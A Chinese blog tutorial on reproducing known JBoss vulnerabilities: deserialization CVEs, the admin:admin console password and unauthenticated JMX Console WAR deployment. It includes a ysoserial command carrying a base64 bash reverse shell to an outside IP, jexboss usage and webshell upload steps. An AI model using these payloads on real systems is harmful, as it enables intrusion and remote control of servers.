Jboss 常见的几种漏洞

CVE-2015-7501

漏洞介绍

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码

影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10

JBoss AS (Wildly) 6 and earlier

JBoss A-MQ 6.2.0

JBoss Fuse 6.2.0

JBoss SOA Platform (SOA-P) 5.3.1

JBoss Data Grid (JDG) 6.5.0

JBoss BRMS (BRMS) 6.1.0

JBoss BPMS (BPMS) 6.1.0

JBoss Data Virtualization (JDV) 6.1.0

JBoss Fuse Service Works (FSW) 6.0.0

JBoss Enterprise Web Server (EWS) 2.1,3.0

漏洞复现 

访问网站

 访问如下接口,发现可以下载,说明是存在漏洞的

下载 ysoserial

⼯具进⾏漏洞利⽤ https://github.com/frohoff/ysoserial 

将要反弹的shell进行base64编码

这个工具需要再java环境下,所以运行命令为

java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjE1LjEzNi4yMTIvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser

 

CVE-2017-7504 

漏洞介绍

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏

影响范围

JBoss 4.x 以及之前的所有版本

漏洞复现

继续访问

访问如下路径:

 

下载工具jexboss

用法python3 jexboss.py -u http://1.15.136.212:8080/ 

 CVE-2017-12149

漏洞简述

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导 致了漏洞

漏洞范围

JBoss 5.x/6.x

漏洞复现

可以利用专门检测该漏洞的检测工具进行检查和利用

 

Administration Console弱⼝令 

漏洞描述

Administration Console管理⻚⾯存在弱⼝令,`admin:admin`,登陆后台上传war包 , getshell

影响版本

全版本

漏洞复现

1.登录后台 admin vulhub

点击web应⽤ ,上传war木马

访问,连接

 

低版本JMX Console未授权 

漏洞描述

此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导 致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能。

影响范围

44 Jboss4.x以下

漏洞复现

这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)admin/admin

找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进 去(通过URL的⽅式远程部署)

 

制作war包 , 这⾥⽤之前制作好的 peak.war , 然后⽤ python 开启web服务 python3 -m http.server

找到:void addURL()

输入war包地址,点击invoke

跳转之后用工具连接

⾼版本JMX Console未授权 

漏洞描述

JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell

影响版本

Jboss6.x以下

漏洞复现

和低版本的差不多,最重要的区别是

在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,

进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏ 远程部署

 

 继续搭建远程服务,war包,然后invoke,工具连接

  • 24
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JBoss反序列化漏洞是指JBoss应用服务器中存在的一种安全漏洞,具体表现为Java反序列化错误类型。该漏洞存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致漏洞的出现。攻击者可以利用此漏洞发送特制的请求,通过发送包含恶意序列化数据的POST请求到`/invoker/readonly`路径,实现远程代码执行的攻击。这个漏洞可以在JBoss 5.x和6.x版本中被利用。如果访问`http://ip:端口/jbossmq-httpil/HTTPServerILServlet`出现相关页面,就可能存在该漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jboss反序列化漏洞](https://blog.csdn.net/weixin_48776804/article/details/116919336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [JBOSS反序列化漏洞](https://blog.csdn.net/weixin_52206305/article/details/125534761)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值